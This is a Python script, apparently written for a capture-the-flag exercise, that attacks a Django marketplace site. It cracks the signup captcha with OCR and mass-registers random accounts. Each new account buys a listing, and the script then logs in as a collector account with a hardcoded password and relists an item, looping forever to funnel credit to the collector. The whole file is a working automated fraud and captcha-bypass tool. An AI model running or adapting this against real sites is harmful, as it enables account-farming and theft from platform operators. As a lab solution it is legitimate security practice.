#!/bin/python import Image import pytesseract import requests from bs4 import BeautifulSoup import urllib, cStringIO import uuid import time # global variable to hold the first item for sale purchase_URL = "" def MakeMeMoney(): # bring the global variable into scope global purchase_URL # create a session object so we dont have to deal with cookies s = requests.Session() # get the signup page and parse it with Beautiful Soup r = s.get("") soup = BeautifulSoup(r.text, 'html.parser') # get the hashed value for the captcha image id_captcha_0 = soup.find(id='id_captcha_0')['value'] # build the URL that points to the captcha image and pull a copy of it URL = '' + id_captcha_0 + '/' file = cStringIO.StringIO(urllib.urlopen(URL).read()) img = Image.open(file) # use tesseract to crack the captcha captcha = pytesseract.image_to_string(img) # get the CSRF middleware token csrfmiddlewaretoken = soup.findAll(attrs={"name" : "csrfmiddlewaretoken"})[0]['value'] # uuid1 is our new accounts username, uuid2 is the password uuid1 = uuid.uuid4().__str__()[:15] uuid2 = uuid.uuid4().__str__()[:15] # use the payload to fill out the form on the signup page and post it payload = {'username': uuid1, 'password1': uuid2, 'password2': uuid2, 'captcha_0': id_captcha_0, 'captcha_1': captcha, 'csrfmiddlewaretoken': csrfmiddlewaretoken} finalpost = s.post("", data=payload) print('post submitted') # parse the response with Beautiful Soup soup = BeautifulSoup(finalpost.text, 'html.parser') try: # if we failed to create an account, the next line will throw an array out of bounds exception if soup.findAll(attrs={"value" : "Log in"})[0] != None: print('post was successful') # write the username and password to a local file, we dont need to do this, its just nice with open("/root/ctf/djangoreg/accounts", "a") as f: f.write(uuid1 + ',' + uuid2 + '\n') print('successfully wrote username and password to file') # get the login page so we can extract the CSRF token from it r = s.get("") soup = BeautifulSoup(r.text, 'html.parser') csrfmiddlewaretoken = soup.findAll(attrs={"name" : "csrfmiddlewaretoken"})[0]['value'] # build the payload to fill out the form on the login page # use the uuid1 and uuid2 variables from the successful account registration payload = {'username': uuid1, 'password': uuid2, 'csrfmiddlewaretoken': csrfmiddlewaretoken} # LOGIN TO THE NEW ACCOUNT finalpost1 = s.post("", data=payload) print('logged in') # perform a get request on the Purchase URL to purchase the item x = s.get(purchase_URL) print('purchased') # Logout s.get("") print('logged out') r = s.get("") print('got login page') # log back in as the account that is collecting all of the funds soup = BeautifulSoup(r.text, 'html.parser') csrfmiddlewaretoken = soup.findAll(attrs={"name" : "csrfmiddlewaretoken"})[0]['value'] payload = {'username': 'makememoney', 'password': 'djangorules', 'csrfmiddlewaretoken': csrfmiddlewaretoken} finalpost = s.post("", data=payload) print('logged in as makememoney') # get the new listing page so we can extract the CSRF token abc = s.get("") soup = BeautifulSoup(abc.text, 'html.parser') csrfmiddlewaretoken = soup.findAll(attrs={"name" : "csrfmiddlewaretoken"})[0]['value'] # create the payload to fill out the new listing form and create the new listing payload = {'name': uuid1, 'details': uuid1, 'csrfmiddlewaretoken': csrfmiddlewaretoken, 'image_src': 'moneymoneymoney', 'cost': '499'} finalfinalpost = s.post("", data=payload) # save our new item URL as purchase_URL for the next iteration to use purchase_URL = finalfinalpost.url + '?buy=1' # logout so we can use the session variable to create a new account s.get("") print('new listing created successfully') print(purchase_URL) except: # the tesseract guess failed the captcha, no account created print('captcha failed') # loop forever while(1): MakeMeMoney()